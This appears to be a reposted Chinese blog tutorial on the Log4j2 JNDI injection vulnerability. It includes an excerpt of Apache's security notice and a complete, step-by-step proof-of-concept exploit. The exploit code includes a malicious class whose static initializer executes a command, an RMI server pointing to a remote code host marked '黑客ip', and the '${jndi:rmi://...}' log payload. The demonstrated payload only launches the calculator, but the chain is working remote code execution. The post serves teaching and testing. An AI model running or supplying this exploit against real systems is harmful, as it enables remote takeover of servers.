log4j 漏洞测试方法(最近Log4j2被爆高危漏洞)

舞跃的灵动

收藏 分享

​​​​​相信大家看到最多的就是这张图片了,打了码,还出来个计算器

log4j 漏洞测试方法(最近Log4j2被爆高危漏洞)(1)

String source = "${jndi:rmi://黑客IP:1099/test}"; logger.error(source); 复制代码

上面这段代码并不会像预想的打印出字符串,"${jndi:rmi://黑客ip:端口/test}"出来,如果这个日志是在自己的机器里打印的,就会在自己的机器里启动计算器工具。

这现象的原理是什么呢?

关键就是这两条:

1、log4j2打印日志时,部分字符串会当成命令名服务被执行。

2、log4j2可以通过jndi:rmi下载远程代码,并在自己机器执行

以下是详细说明:

Apache Log4j 2 Apache log4j 2 is an upgrade to Log4j that provides significant improvements over its predecessor, Log4j 1.x, and provides many of the improvements available in Logback while fixing some inherent problems in Logback’s architecture. Important: Security Vulnerability CVE-2021-45046 The Log4j team has been made aware of a security vulnerability, CVE-2021-45046, that has been addressed in Log4j 2.12.2 for Java 7 and 2.16.0 for Java 8 and up. Summary: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack. Details It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration such as setting the system property log4j2.noFormatMsgLookup to true do NOT mitigate this specific vulnerability. 复制代码

以上是apache官网的一段说明,我们之前使用的log打印一般是log4j,然后就是logback当然springboot默认的也是logbac。因为在性能上logback优于log4j,从官网上看log4j2性能会优于log4j及logback,所以后面不少人升级成log4j2当然好像这几个的作者都是同一个大神。

回到我们的问题为什么会出现这种问题,还是官网上说的log4j2提供了一些可以让用户查询一些配置信息

log4j 漏洞测试方法(最近Log4j2被爆高危漏洞)(2)

​上图可以看出log4j2通过 logger.info("java:hw")可以打印出服务器cpu信息出来而不是字符串“{java:hw}")可以打印出服务器cpu信息出来而不是字符串“java:hw")可以打印出服务器cpu信息出来而不是字符串“{java:hw}”,大家可以看到这个就类似sql注入也,另外一个关键的就是log4j2此功能是通过java lookup实现的,也就是说黑客可以这样操作:

log4j 漏洞测试方法(最近Log4j2被爆高危漏洞)(3)

从上图可以看出,最关键的地方就在红色部署,用户机器会下载黑客的可执行文件并在用户机器上执行就是这病毒了,最上面演示的demo就是黑客让用户执行了自己机器上打开了计算器工具。

如果大家想自己实验一下可以参考以下的代码,这个是引用了网上一篇博客:

原文链接:blog.csdn.net/lizz861109/…

当然这篇博客没有实现 rmi://127.0.0.1:1099/xxxx 这个rmi服务代码可参考:

​p.s. 网上很多程序都不完整或打了码

//step1:在黑客机新建HackerObj.java import javax.lang.model.element.Name; import javax.naming.Context; import java.io.BufferedInputStream; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; import java.util.HashMap; /** * @Author: hanko * @Date: 2021-12-16 10:12 */ public class HackerObj { public static void exec(String cmd) throws IOException { String sb = ""; BufferedInputStream bufferedInputStream = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream()); BufferedReader inBr = new BufferedReader(new InputStreamReader(bufferedInputStream)); String lineStr; while ((lineStr = inBr.readLine()) != null) { sb = lineStr "\n"; } inBr.close(); inBr.close(); } public Object getObjectInstance(Object obj, Name name, Context context, HashMap<?, ?> environment) throws Exception { return null; } static { try { System.out.println("黑客程序在此机器被执行了。"); exec("calc.exe"); } catch (Exception e) { e.printStackTrace(); } } } //step2:在黑客机把HackerObj.java编译成HackerObj.class,然后开个nginx把HackerObj.class放进去让它可以在网络上访问,如: http://黑客ip:8080/HackerObj.class p.s. HackerObj.java创造时不要放在package里,放package里好像被用户下载会提示notfindclass,有空再研究一下。 //step3: 创建个Server.java启动黑客rmi服务 package com.jndi; import com.sun.jndi.rmi.registry.ReferenceWrapper; import javax.naming.NamingException; import javax.naming.Reference; import java.rmi.AlreadyBoundException; import java.rmi.RemoteException; import java.rmi.registry.LocateRegistry; import java.rmi.registry.Registry; /** * @Author: hanko * @Date: 2021-12-16 9:18 */ public class Server { public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException { Registry registry = LocateRegistry.createRegistry(1099); //http://黑客ip:8080/HackerObj.class String url = "http://黑客ip:8080/"; System.out.println("Create RMI registry on port 1099"); Reference reference = new Reference("HackerObj", "HackerObj", url); ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference); registry.bind("test", referenceWrapper); } } //stpe4:在用户机新建Client.java, package com.jndi; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; /** * @Author: hanko * @Date: 2021-12-16 10:27 */ public class Client { static Logger logger = LogManager.getLogger(); public static void main(String[] args) { logger.error("${jndi:rmi://黑客ip:1099/test}"); } } // 在用户机执行Client.java会发现“黑客程序在此机器被执行了。” //在用户机器打印出来了,同时用户机器计算器工具也被打开了 //step5: log4j2 复现就是用以下代码 logger.info("${java:vm}"); logger.error("${jndi:rmi://黑客ip:1099/test}"); 复制代码

总结

关键就是这两条:

1、log4j2打印日志时,部分字符串会当成命令名服务被执行。

2、log4j2可以通过jndi:rmi下载远程代码,并在自己机器执行

作者:玄明Hanko原文链接:https://juejin.cn/post/7042145376400801823

,
展开全文

免责声明:本文仅代表文章作者的个人观点,与本站无关。其原创性、真实性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容文字的真实性、完整性和原创性本站不作任何保证或承诺,请读者仅作参考,并自行核实相关内容。文章投诉邮箱:anhduc.ph@yahoo.com

猜您喜欢

    热门推荐

    Copyright © 2013-2024 秒懂生活 站务投诉邮箱:anhduc.ph@yahoo.com

    分享
    投诉
    首页